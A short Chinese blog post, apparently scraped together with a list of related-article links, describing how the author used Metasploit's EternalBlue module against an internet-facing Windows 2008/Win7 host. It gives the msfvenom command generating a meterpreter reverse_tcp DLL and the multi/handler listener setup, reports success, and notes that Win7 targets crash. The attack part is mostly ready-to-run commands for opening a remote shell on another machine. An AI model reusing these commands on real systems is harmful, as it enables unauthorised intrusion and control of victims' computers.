前几天就想写的,因为一些缘故就没写。此次是在外网环境下进行的。大家在内网中也一个样。

方法:

  使用Eternalblue模块,剑测是否有漏洞然后msf生成一个dll直接反弹shell.

PS:win版本的不知道缘何生成出来的dll是0kb 我就在自己本地的虚拟机生成了一个dll。生成dll命令

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.52.130 LPORT=6566 -f dll > /opt/xishaonian.dll

然后copy到了自己的测试机。

测试机IP:118.244.x.x

被攻击者IP:119.29.x.x

MSF监听命令:

use exploit/multi/handler

set LHOST 192.168.1.109

set LPORT 6566

set PAYLOAD windows/x64/meterpreter/reverse_tcp

run

成功。

在测试当中,发现win7的会被蓝屏,而08的却不会

方程式漏洞之复现window2008/win7 远程命令执行漏洞相关推荐

  1. PHPMailer远程命令执行漏洞复现

    ​PHPMailer远程命令执行漏洞复现 一.漏洞简介 PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, ...

  2. 开源堡垒机JumpServer远程命令执行漏洞复现

    声明 好好学习,天天向上 漏洞描述 JumpServer 是全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 是符合4A 的专业运维审计系统.JumpServer 使用Python ...

  3. 华为路由器远程命令执行漏洞复现(CVE-2017-17215)

    华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值. CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞 ...

  4. Dlink路由器 CNVD-2018-01084 远程命令执行漏洞 复现分析

    Dlink路由器 CNVD-2018-01084复现分析 0x01 背景介绍 D-Link DIR 615/645/815路由器1.03及之前的固件版本存在远程命令执行漏洞.该漏洞是由于service ...

  5. Apache[多后缀文件名解析漏洞+换行解析漏洞+SSI远程命令执行漏洞]复现

    目录 一.多后缀文件解析漏洞 二.Apache换行解析漏洞(CVE-2017-15715) 三.Apache SSI 远程命令执行漏洞

  6. ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程命令执行漏洞

    ThinkPHP 5.0.x.5.1.x.5.2.x 全版本远程代码执行漏洞 漏洞概述: ThinkPHP是一个快速.兼容而且简单的轻量级国产PHP开发框架.借鉴Struts框架的Action对象,同 ...

  7. Yapi远程命令执行漏洞

    命令执行漏洞利用的条件? 攻击者可以控制eval函数的参数 [漏洞名称] Yapi远程命令执行漏洞 [漏洞详情] Yapi接口管理平台,使用Mock数据/脚本作为中间交互层,为前端后台开发与测试人员提 ...

  8. H3C iMC 存在远程命令执行漏洞

    文章目录 H3C iMC 存在远程命令执行漏洞 1. H3C iMC 简介 2.漏洞描述 3.影响版本 4.fofa 查询语句 5.漏洞复现 6.POC&EXP 7.整改意见 8.往期回顾 H ...

  9. GoAhead远程命令执行漏洞(CVE-2021-42342)

    GoAhead远程命令执行漏洞(CVE-2021-42342) 目录 GoAhead远程命令执行漏洞(CVE-2021-42342) 漏洞描述 漏洞复现 启动环境 复现漏洞 漏洞描述 漏洞主要是由于上 ...

最新文章

  1. 如何正确使用SqlConnection
  2. 文件上传检测的基本思路
  3. 【Nginx】应用静态化配置
  4. 大厂疯传!Python+商业数据分析+数据可视化教程(附项目案例)
  5. WCF服务端基于配置的实现——拦截
  6. git-工作区与暂存区
  7. Python从命令行参数和配置文件获取信息
  8. InnoDB存储引擎介绍-(1)InnoDB存储引擎结构
  9. Python 最新版破解滑块验证码自动登录QQ空间
  10. 如何批量把照片设置统一尺寸?
  11. 从CentOS7默认安装的/home中转移空间到根目录/ - LVM操作简明教程
  12. 论文解读:MOEA/D-TPN
  13. 关于SVN无法cleanup的问题
  14. 古瑞瓦特,固德威,阳光电源,那种5KW家庭式的储能方案
  15. easypoi 实现多sheet导出excel
  16. PRTSCR即print screen。
  17. 晶联讯12864液晶+STM32+HAL库 IO模拟SPI成功实现显示。
  18. 中标麒麟系统安装达梦8 数据库
  19. 从http协议看百度360大战
  20. 如何利用市场情绪套利

热门文章

  1. matlab 最小二乘法拟合_计量与论文串讲:最小二乘法
  2. OpenCV自带dnn的Example研究(3)— object_detection
  3. Javascript系列——对象元素的数组去重实现
  4. postgresql 高可用 etcd + patroni 之二 patroni
  5. Shiro身份认证---转
  6. php审计学习:xdcms2.0.8注入
  7. Android实践 -- 对apk进行系统签名
  8. 让input变成不可编辑状态的方法
  9. 软件工程进度条-第十五周
  10. 团队项目:个人工作总结10